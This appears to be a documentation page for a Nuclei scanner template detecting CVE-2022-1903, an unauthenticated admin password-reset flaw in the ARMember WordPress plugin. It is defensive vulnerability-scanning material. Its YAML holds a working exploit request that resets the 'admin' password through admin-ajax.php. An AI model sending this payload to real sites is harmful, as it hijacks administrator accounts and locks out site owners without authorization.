ARMember < 3.4.8 - Unauthenticated Admin Account Takeover
ID: CVE-2022-1903
Severity: high
Author: theamanrawat
Tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin
Description
Section titled “Description”The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username.
YAML Source
Section titled “YAML Source”id: CVE-2022-1903
info: name: ARMember < 3.4.8 - Unauthenticated Admin Account Takeover author: theamanrawat severity: high description: | The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username. impact: | An attacker can gain unauthorized access to the admin account, potentially leading to further compromise of the system. remediation: Fixed in version 3.4.8 reference: - https://wpscan.com/vulnerability/28d26aa6-a8db-4c20-9ec7-39821c606a08 - https://wordpress.org/plugins/armember-membership/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1903 - https://github.com/SYRTI/POC_to_review - https://github.com/WhooAmii/POC_to_review classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2022-1903 cwe-id: CWE-862 epss-score: 0.70044 epss-percentile: 0.98014 cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: armemberplugin product: armember framework: wordpress tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin
http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
action=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin
matchers-condition: and matchers: - type: word part: body words: - "Your Password has been reset" - "arm_success_msg" condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a00473045022002493caa4a814e62b7356901a9fe76fd2ea835647ed594f78635ea5f483466590221009c6efec0b87d495fe0e555c000ec8eb2f9db80581aa687a347d0cc0eabfb6638:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1903.yaml"